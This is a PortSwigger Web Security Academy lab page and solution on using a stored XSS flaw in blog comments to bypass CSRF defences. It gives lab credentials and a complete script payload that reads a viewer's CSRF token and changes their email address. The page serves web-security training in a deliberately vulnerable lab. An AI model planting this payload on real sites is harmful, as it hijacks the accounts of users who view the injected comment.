Lab: Exploiting XSS to bypass CSRF defenses

PRACTITIONER

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to steal a CSRF token, which you can then use to change the email address of someone who views the blog post comments.

You can log in to your own account using the following credentials: wiener:peter

Hint

You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, use a different email address for the final exploit you deliver to the victim.

ACCESS THE LAB

Solution

Log in using the credentials provided. On your user account page, notice the function for updating your email address.
If you view the source for the page, you'll see the following information:
- You need to issue a POST request to /my-account/change-email, with a parameter called email.
- There's an anti-CSRF token in a hidden input called token.
This means your exploit will need to load the user account page, extract the CSRF token, and then use the token to change the victim's email address.
Submit the following payload in a blog comment:
<script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/my-account',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf='+token+'&email=test@test.com') }; </script>
This will make anyone who views the comment issue a POST request to change their email address to test@test.com.

Community solutions

z3nsh3ll

Michael Sommer

Register for free to track your learning progress

The benefits of working through PortSwigger's Web Security Academy

Practise exploiting vulnerabilities on realistic targets.
Record your progression from Apprentice to Expert.
See where you rank in our Hall of Fame.

Already got an account? Login here